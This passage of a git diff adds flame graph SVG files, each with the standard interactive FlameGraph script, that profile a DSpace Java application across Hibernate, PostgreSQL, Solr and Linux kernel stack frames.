+<title>do_softirq.part.0 (6 samples, 0.89%)</title><rect x="511.0" y="677" width="10.4" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="513.98" y="687.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.15%)</title><rect x="940.4" y="453" width="1.7" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="943.38" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (2 samples, 0.30%)</title><rect x="823.4" y="453" width="3.5" height="15.0" fill="rgb(224,84,84)" rx="2" ry="2" />
+<text  x="826.43" y="463.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (2 samples, 0.30%)</title><rect x="966.6" y="357" width="3.5" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="969.57" y="367.5" ></text>
+</g>
+<g >
+<title>__vma_adjust (2 samples, 0.30%)</title><rect x="360.9" y="709" width="3.4" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="363.86" y="719.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (11 samples, 1.63%)</title><rect x="1116.7" y="469" width="19.2" height="15.0" fill="rgb(104,250,104)" rx="2" ry="2" />
+<text  x="1119.69" y="479.5" ></text>
+</g>
+<g >
+<title>native_write_msr (8 samples, 1.18%)</title><rect x="271.8" y="725" width="14.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="274.83" y="735.5" ></text>
+</g>
+<g >
+<title>java/lang/Integer:::equals (1 samples, 0.15%)</title><rect x="748.4" y="405" width="1.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="751.37" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="341" width="1.7" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="241.67" y="351.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="591.3" y="469" width="1.7" height="15.0" fill="rgb(229,93,93)" rx="2" ry="2" />
+<text  x="594.27" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (2 samples, 0.30%)</title><rect x="587.8" y="421" width="3.5" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="590.78" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (21 samples, 3.11%)</title><rect x="991.0" y="469" width="36.7" height="15.0" fill="rgb(68,217,68)" rx="2" ry="2" />
+<text  x="994.01" y="479.5" >org..</text>
+</g>
+<g >
+<title>perf_swevent_add (1 samples, 0.15%)</title><rect x="460.4" y="693" width="1.7" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="463.36" y="703.5" ></text>
+</g>
+<g >
+<title>vma_merge (2 samples, 0.30%)</title><rect x="360.9" y="725" width="3.4" height="15.0" fill="rgb(223,83,83)" rx="2" ry="2" />
+<text  x="363.86" y="735.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1050.4" y="421" width="1.7" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="1053.36" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/AbstractStringBuilder:::append (1 samples, 0.15%)</title><rect x="970.1" y="549" width="1.7" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="973.06" y="559.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (54 samples, 7.99%)</title><rect x="367.8" y="773" width="94.3" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="370.84" y="783.5" >finish_task..</text>
+</g>
+<g >
+<title>[libjvm.so] (73 samples, 10.80%)</title><rect x="116.5" y="757" width="127.4" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="119.48" y="767.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::isDirty (10 samples, 1.48%)</title><rect x="573.8" y="485" width="17.5" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="576.82" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (13 samples, 1.92%)</title><rect x="1055.6" y="517" width="22.7" height="15.0" fill="rgb(67,216,67)" rx="2" ry="2" />
+<text  x="1058.59" y="527.5" >o..</text>
+</g>
+<g >
+<title>[libjvm.so] (22 samples, 3.25%)</title><rect x="205.5" y="725" width="38.4" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="208.50" y="735.5" >[li..</text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (13 samples, 1.92%)</title><rect x="243.9" y="885" width="22.7" height="15.0" fill="rgb(228,90,90)" rx="2" ry="2" />
+<text  x="246.91" y="895.5" >e..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultDirtyCheckEventListener:::onDirtyCheck (11 samples, 1.63%)</title><rect x="893.3" y="517" width="19.2" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="896.25" y="527.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="549" width="3.5" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="241.67" y="559.5" ></text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.15%)</title><rect x="359.1" y="677" width="1.8" height="15.0" fill="rgb(201,51,51)" rx="2" ry="2" />
+<text  x="362.11" y="687.5" ></text>
+</g>
+<g >
+<title>java/lang/ref/Finalizer:::register (1 samples, 0.15%)</title><rect x="929.9" y="389" width="1.8" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="932.91" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/spring/SpringServiceManager:::getServicesByType (2 samples, 0.30%)</title><rect x="1148.1" y="549" width="3.5" height="15.0" fill="rgb(93,239,93)" rx="2" ry="2" />
+<text  x="1151.11" y="559.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (12 samples, 1.78%)</title><rect x="243.9" y="773" width="21.0" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="246.91" y="783.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (1 samples, 0.15%)</title><rect x="1113.2" y="389" width="1.7" height="15.0" fill="rgb(247,118,118)" rx="2" ry="2" />
+<text  x="1116.20" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (2 samples, 0.30%)</title><rect x="938.6" y="501" width="3.5" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="941.64" y="511.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (372 samples, 55.03%)</title><rect x="528.4" y="693" width="649.4" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="531.43" y="703.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::applyPostLoadLocks (1 samples, 0.15%)</title><rect x="921.2" y="501" width="1.7" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="924.18" y="511.5" ></text>
+</g>
+<g >
+<title>native_write_msr (52 samples, 7.69%)</title><rect x="369.6" y="725" width="90.8" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="372.59" y="735.5" >native_wri..</text>
+</g>
+</g>
+</svg>
diff --git a/docs/2020/02/out.dspace510-3.svg b/docs/2020/02/out.dspace510-3.svg
new file mode 100644
index 000000000..a96d21a67
--- /dev/null
+++ b/docs/2020/02/out.dspace510-3.svg
@@ -0,0 +1,2628 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" width="1200" height="838" onload="init(evt)" viewBox="0 0 1200 838" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+<!-- Flame graph stack visualization. See https://github.com/brendangregg/FlameGraph for latest version, and http://www.brendangregg.com/flamegraphs.html for examples. -->
+<!-- NOTES:  -->
+<defs>
+	<linearGradient id="background" y1="0" y2="1" x1="0" x2="0" >
+		<stop stop-color="#eeeeee" offset="5%" />
+		<stop stop-color="#eeeeb0" offset="95%" />
+	</linearGradient>
+</defs>
+<style type="text/css">
+	text { font-family:Verdana; font-size:12px; fill:rgb(0,0,0); }
+	#search, #ignorecase { opacity:0.1; cursor:pointer; }
+	#search:hover, #search.show, #ignorecase:hover, #ignorecase.show { opacity:1; }
+	#subtitle { text-anchor:middle; font-color:rgb(160,160,160); }
+	#title { text-anchor:middle; font-size:17px}
+	#unzoom { cursor:pointer; }
+	#frames > *:hover { stroke:black; stroke-width:0.5; cursor:pointer; }
+	.hide { display:none; }
+	.parent { opacity:0.5; }
+</style>
+<script type="text/ecmascript">
+<![CDATA[
+	"use strict";
+	var details, searchbtn, unzoombtn, matchedtxt, svg, searching, currentSearchTerm, ignorecase, ignorecaseBtn;
+	function init(evt) {
+		details = document.getElementById("details").firstChild;
+		searchbtn = document.getElementById("search");
+		ignorecaseBtn = document.getElementById("ignorecase");
+		unzoombtn = document.getElementById("unzoom");
+		matchedtxt = document.getElementById("matched");
+		svg = document.getElementsByTagName("svg")[0];
+		searching = 0;
+		currentSearchTerm = null;
+	}
+
+	window.addEventListener("click", function(e) {
+		var target = find_group(e.target);
+		if (target) {
+			if (target.nodeName == "a") {
+				if (e.ctrlKey === false) return;
+				e.preventDefault();
+			}
+			if (target.classList.contains("parent")) unzoom();
+			zoom(target);
+		}
+		else if (e.target.id == "unzoom") unzoom();
+		else if (e.target.id == "search") search_prompt();
+		else if (e.target.id == "ignorecase") toggle_ignorecase();
+	}, false)
+
+	// mouse-over for info
+	// show
+	window.addEventListener("mouseover", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = "Function: " + g_to_text(target);
+	}, false)
+
+	// clear
+	window.addEventListener("mouseout", function(e) {
+		var target = find_group(e.target);
+		if (target) details.nodeValue = ' ';
+	}, false)
+
+	// ctrl-F for search
+	window.addEventListener("keydown",function (e) {
+		if (e.keyCode === 114 || (e.ctrlKey && e.keyCode === 70)) {
+			e.preventDefault();
+			search_prompt();
+		}
+	}, false)
+
+	// ctrl-I to toggle case-sensitive search
+	window.addEventListener("keydown",function (e) {
+		if (e.ctrlKey && e.keyCode === 73) {
+			e.preventDefault();
+			toggle_ignorecase();
+		}
+	}, false)
+
+	// functions
+	function find_child(node, selector) {
+		var children = node.querySelectorAll(selector);
+		if (children.length) return children[0];
+		return;
+	}
+	function find_group(node) {
+		var parent = node.parentElement;
+		if (!parent) return;
+		if (parent.id == "frames") return node;
+		return find_group(parent);
+	}
+	function orig_save(e, attr, val) {
+		if (e.attributes["_orig_" + attr] != undefined) return;
+		if (e.attributes[attr] == undefined) return;
+		if (val == undefined) val = e.attributes[attr].value;
+		e.setAttribute("_orig_" + attr, val);
+	}
+	function orig_load(e, attr) {
+		if (e.attributes["_orig_"+attr] == undefined) return;
+		e.attributes[attr].value = e.attributes["_orig_" + attr].value;
+		e.removeAttribute("_orig_"+attr);
+	}
+	function g_to_text(e) {
+		var text = find_child(e, "title").firstChild.nodeValue;
+		return (text)
+	}
+	function g_to_func(e) {
+		var func = g_to_text(e);
+		// if there's any manipulation we want to do to the function
+		// name before it's searched, do it here before returning.
+		return (func);
+	}
+	function update_text(e) {
+		var r = find_child(e, "rect");
+		var t = find_child(e, "text");
+		var w = parseFloat(r.attributes.width.value) -3;
+		var txt = find_child(e, "title").textContent.replace(/\([^(]*\)$/,"");
+		t.attributes.x.value = parseFloat(r.attributes.x.value) + 3;
+
+		// Smaller than this size won't fit anything
+		if (w < 2 * 12 * 0.59) {
+			t.textContent = "";
+			return;
+		}
+
+		t.textContent = txt;
+		// Fit in full text width
+		if (/^ *$/.test(txt) || t.getSubStringLength(0, txt.length) < w)
+			return;
+
+		for (var x = txt.length - 2; x > 0; x--) {
+			if (t.getSubStringLength(0, x + 2) <= w) {
+				t.textContent = txt.substring(0, x) + "..";
+				return;
+			}
+		}
+		t.textContent = "";
+	}
+
+	// zoom
+	function zoom_reset(e) {
+		if (e.attributes != undefined) {
+			orig_load(e, "x");
+			orig_load(e, "width");
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_reset(c[i]);
+		}
+	}
+	function zoom_child(e, x, ratio) {
+		if (e.attributes != undefined) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = (parseFloat(e.attributes.x.value) - x - 10) * ratio + 10;
+				if (e.tagName == "text")
+					e.attributes.x.value = find_child(e.parentNode, "rect[x]").attributes.x.value + 3;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseFloat(e.attributes.width.value) * ratio;
+			}
+		}
+
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_child(c[i], x - 10, ratio);
+		}
+	}
+	function zoom_parent(e) {
+		if (e.attributes) {
+			if (e.attributes.x != undefined) {
+				orig_save(e, "x");
+				e.attributes.x.value = 10;
+			}
+			if (e.attributes.width != undefined) {
+				orig_save(e, "width");
+				e.attributes.width.value = parseInt(svg.width.baseVal.value) - (10 * 2);
+			}
+		}
+		if (e.childNodes == undefined) return;
+		for (var i = 0, c = e.childNodes; i < c.length; i++) {
+			zoom_parent(c[i]);
+		}
+	}
+	function zoom(node) {
+		var attr = find_child(node, "rect").attributes;
+		var width = parseFloat(attr.width.value);
+		var xmin = parseFloat(attr.x.value);
+		var xmax = parseFloat(xmin + width);
+		var ymin = parseFloat(attr.y.value);
+		var ratio = (svg.width.baseVal.value - 2 * 10) / width;
+
+		// XXX: Workaround for JavaScript float issues (fix me)
+		var fudge = 0.0001;
+
+		unzoombtn.classList.remove("hide");
+
+		var el = document.getElementById("frames").children;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var a = find_child(e, "rect").attributes;
+			var ex = parseFloat(a.x.value);
+			var ew = parseFloat(a.width.value);
+			var upstack;
+			// Is it an ancestor
+			if (0 == 0) {
+				upstack = parseFloat(a.y.value) > ymin;
+			} else {
+				upstack = parseFloat(a.y.value) < ymin;
+			}
+			if (upstack) {
+				// Direct ancestor
+				if (ex <= xmin && (ex+ew+fudge) >= xmax) {
+					e.classList.add("parent");
+					zoom_parent(e);
+					update_text(e);
+				}
+				// not in current path
+				else
+					e.classList.add("hide");
+			}
+			// Children maybe
+			else {
+				// no common path
+				if (ex < xmin || ex + fudge >= xmax) {
+					e.classList.add("hide");
+				}
+				else {
+					zoom_child(e, xmin, ratio);
+					update_text(e);
+				}
+			}
+		}
+		search();
+	}
+	function unzoom() {
+		unzoombtn.classList.add("hide");
+		var el = document.getElementById("frames").children;
+		for(var i = 0; i < el.length; i++) {
+			el[i].classList.remove("parent");
+			el[i].classList.remove("hide");
+			zoom_reset(el[i]);
+			update_text(el[i]);
+		}
+		search();
+	}
+
+	// search
+	function toggle_ignorecase() {
+		ignorecase = !ignorecase;
+		if (ignorecase) {
+			ignorecaseBtn.classList.add("show");
+		} else {
+			ignorecaseBtn.classList.remove("show");
+		}
+		reset_search();
+		search();
+	}
+	function reset_search() {
+		var el = document.querySelectorAll("#frames rect");
+		for (var i = 0; i < el.length; i++) {
+			orig_load(el[i], "fill")
+		}
+	}
+	function search_prompt() {
+		if (!searching) {
+			var term = prompt("Enter a search term (regexp " +
+			    "allowed, eg: ^ext4_)"
+			    + (ignorecase ? ", ignoring case" : "")
+			    + "\nPress Ctrl-i to toggle case sensitivity", "");
+			if (term != null) {
+				currentSearchTerm = term;
+				search();
+			}
+		} else {
+			reset_search();
+			searching = 0;
+			currentSearchTerm = null;
+			searchbtn.classList.remove("show");
+			searchbtn.firstChild.nodeValue = "Search"
+			matchedtxt.classList.add("hide");
+			matchedtxt.firstChild.nodeValue = ""
+		}
+	}
+	function search(term) {
+		if (currentSearchTerm === null) return;
+		var term = currentSearchTerm;
+
+		var re = new RegExp(term, ignorecase ? 'i' : '');
+		var el = document.getElementById("frames").children;
+		var matches = new Object();
+		var maxwidth = 0;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var func = g_to_func(e);
+			var rect = find_child(e, "rect");
+			if (func == null || rect == null)
+				continue;
+
+			// Save max width. Only works as we have a root frame
+			var w = parseFloat(rect.attributes.width.value);
+			if (w > maxwidth)
+				maxwidth = w;
+
+			if (func.match(re)) {
+				// highlight
+				var x = parseFloat(rect.attributes.x.value);
+				orig_save(rect, "fill");
+				rect.attributes.fill.value = "rgb(230,0,230)";
+
+				// remember matches
+				if (matches[x] == undefined) {
+					matches[x] = w;
+				} else {
+					if (w > matches[x]) {
+						// overwrite with parent
+						matches[x] = w;
+					}
+				}
+				searching = 1;
+			}
+		}
+		if (!searching)
+			return;
+
+		searchbtn.classList.add("show");
+		searchbtn.firstChild.nodeValue = "Reset Search";
+
+		// calculate percent matched, excluding vertical overlap
+		var count = 0;
+		var lastx = -1;
+		var lastw = 0;
+		var keys = Array();
+		for (k in matches) {
+			if (matches.hasOwnProperty(k))
+				keys.push(k);
+		}
+		// sort the matched frames by their x location
+		// ascending, then width descending
+		keys.sort(function(a, b){
+			return a - b;
+		});
+		// Step through frames saving only the biggest bottom-up frames
+		// thanks to the sort order. This relies on the tree property
+		// where children are always smaller than their parents.
+		var fudge = 0.0001;	// JavaScript floating point
+		for (var k in keys) {
+			var x = parseFloat(keys[k]);
+			var w = matches[keys[k]];
+			if (x >= lastx + lastw - fudge) {
+				count += w;
+				lastx = x;
+				lastw = w;
+			}
+		}
+		// display matched percent
+		matchedtxt.classList.remove("hide");
+		var pct = 100 * count / maxwidth;
+		if (pct != 100) pct = pct.toFixed(1)
+		matchedtxt.firstChild.nodeValue = "Matched: " + pct + "%";
+	}
+]]>
+</script>
+<rect x="0.0" y="0" width="1200.0" height="838.0" fill="url(#background)"  />
+<text id="title" x="600.00" y="24" >Flame Graph</text>
+<text id="details" x="10.00" y="821" > </text>
+<text id="unzoom" x="10.00" y="24" class="hide">Reset Zoom</text>
+<text id="search" x="1090.00" y="24" >Search</text>
+<text id="ignorecase" x="1174.00" y="24" >ic</text>
+<text id="matched" x="1090.00" y="821" > </text>
+<g id="frames">
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::&lt;init&gt; (1 samples, 0.48%)</title><rect x="958.5" y="357" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="961.52" y="367.5" ></text>
+</g>
+<g >
+<title>process_backlog (5 samples, 2.39%)</title><rect x="360.0" y="357" width="28.3" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="363.05" y="367.5" >p..</text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.48%)</title><rect x="473.0" y="389" width="5.6" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="475.97" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1071.4" y="229" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1074.44" y="239.5" ></text>
+</g>
+<g >
+<title>[libnet.so] (1 samples, 0.48%)</title><rect x="1139.2" y="261" width="5.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1142.19" y="271.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/VisibleBufferedInputStream:::readMore (1 samples, 0.48%)</title><rect x="715.7" y="261" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="718.74" y="271.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getDelegate (7 samples, 3.35%)</title><rect x="873.8" y="325" width="39.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="876.83" y="335.5" >org..</text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (16 samples, 7.66%)</title><rect x="173.7" y="533" width="90.4" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="176.73" y="543.5" >__perf_eve..</text>
+</g>
+<g >
+<title>Interpreter (134 samples, 64.11%)</title><rect x="410.9" y="453" width="756.5" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="413.86" y="463.5" >Interpreter</text>
+</g>
+<g >
+<title>org/springframework/core/env/MutablePropertySources:::addLast (5 samples, 2.39%)</title><rect x="580.2" y="309" width="28.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="583.24" y="319.5" >o..</text>
+</g>
+<g >
+<title>perf_event_task_tick (1 samples, 0.48%)</title><rect x="631.1" y="213" width="5.6" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="634.05" y="223.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (2 samples, 0.96%)</title><rect x="1144.8" y="293" width="11.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1147.83" y="303.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::receiveTupleV3 (1 samples, 0.48%)</title><rect x="653.6" y="245" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="255.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range (1 samples, 0.48%)</title><rect x="930.3" y="101" width="5.6" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="933.29" y="111.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.48%)</title><rect x="653.6" y="261" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="271.5" ></text>
+</g>
+<g >
+<title>java/lang/AbstractStringBuilder:::append (1 samples, 0.48%)</title><rect x="648.0" y="373" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="650.99" y="383.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/TimestampUtils:::parseBackendTimestamp (1 samples, 0.48%)</title><rect x="427.8" y="341" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="430.80" y="351.5" ></text>
+</g>
+<g >
+<title>start_thread (138 samples, 66.03%)</title><rect x="410.9" y="757" width="779.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="413.86" y="767.5" >start_thread</text>
+</g>
+<g >
+<title>java/lang/AbstractStringBuilder:::append (1 samples, 0.48%)</title><rect x="1060.1" y="357" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1063.14" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/utils/URLEncodedUtils:::parse (1 samples, 0.48%)</title><rect x="924.6" y="261" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="927.64" y="271.5" ></text>
+</g>
+<g >
+<title>Interpreter (134 samples, 64.11%)</title><rect x="410.9" y="661" width="756.5" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="413.86" y="671.5" >Interpreter</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (3 samples, 1.44%)</title><rect x="986.7" y="357" width="17.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="989.75" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (3 samples, 1.44%)</title><rect x="924.6" y="341" width="17.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="927.64" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.48%)</title><rect x="664.9" y="373" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="667.93" y="383.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::unIndexContent (8 samples, 3.83%)</title><rect x="1116.6" y="421" width="45.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1119.60" y="431.5" >org/..</text>
+</g>
+<g >
+<title>schedule (1 samples, 0.48%)</title><rect x="1150.5" y="133" width="5.6" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1153.48" y="143.5" ></text>
+</g>
+<g >
+<title>tcp_write_xmit (14 samples, 6.70%)</title><rect x="314.9" y="581" width="79.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="317.88" y="591.5" >tcp_write..</text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::isStale (1 samples, 0.48%)</title><rect x="1156.1" y="309" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1159.12" y="319.5" ></text>
+</g>
+<g >
+<title>dequeue_task_fair (1 samples, 0.48%)</title><rect x="168.1" y="533" width="5.6" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="171.09" y="543.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="687.5" y="325" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="690.51" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (13 samples, 6.22%)</title><rect x="789.1" y="277" width="73.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="792.14" y="287.5" >org/apac..</text>
+</g>
+<g >
+<title>JNU_ThrowByName (1 samples, 0.48%)</title><rect x="1156.1" y="213" width="5.7" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1159.12" y="223.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="1088.4" y="245" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1091.37" y="255.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.48%)</title><rect x="659.3" y="245" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="662.28" y="255.5" ></text>
+</g>
+<g >
+<title>ip_finish_output2 (6 samples, 2.87%)</title><rect x="354.4" y="453" width="33.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="357.40" y="463.5" >ip..</text>
+</g>
+<g >
+<title>java/nio/charset/CharsetEncoder:::encode (7 samples, 3.35%)</title><rect x="811.7" y="165" width="39.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="814.72" y="175.5" >jav..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (3 samples, 1.44%)</title><rect x="670.6" y="357" width="16.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="673.57" y="367.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (24 samples, 11.48%)</title><rect x="26.9" y="693" width="135.5" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="29.94" y="703.5" >__x64_sys_futex</text>
+</g>
+<g >
+<title>ttwu_do_activate (1 samples, 0.48%)</title><rect x="371.3" y="69" width="5.7" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="374.34" y="79.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgPreparedStatement:::executeQuery (2 samples, 0.96%)</title><rect x="653.6" y="309" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="656.64" y="319.5" ></text>
+</g>
+<g >
+<title>java/net/URI:::&lt;init&gt; (1 samples, 0.48%)</title><rect x="1122.2" y="277" width="5.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1125.25" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.96%)</title><rect x="518.1" y="277" width="11.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="521.13" y="287.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/Header:::addField (4 samples, 1.91%)</title><rect x="749.6" y="357" width="22.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.62" y="367.5" >o..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.48%)</title><rect x="1156.1" y="181" width="5.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1159.12" y="191.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getPropertyAsType (16 samples, 7.66%)</title><rect x="518.1" y="389" width="90.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="521.13" y="399.5" >org/dspace..</text>
+</g>
+<g >
+<title>java/util/IdentityHashMap:::put (1 samples, 0.48%)</title><rect x="772.2" y="197" width="5.6" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="775.20" y="207.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::next (2 samples, 0.96%)</title><rect x="422.2" y="405" width="11.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
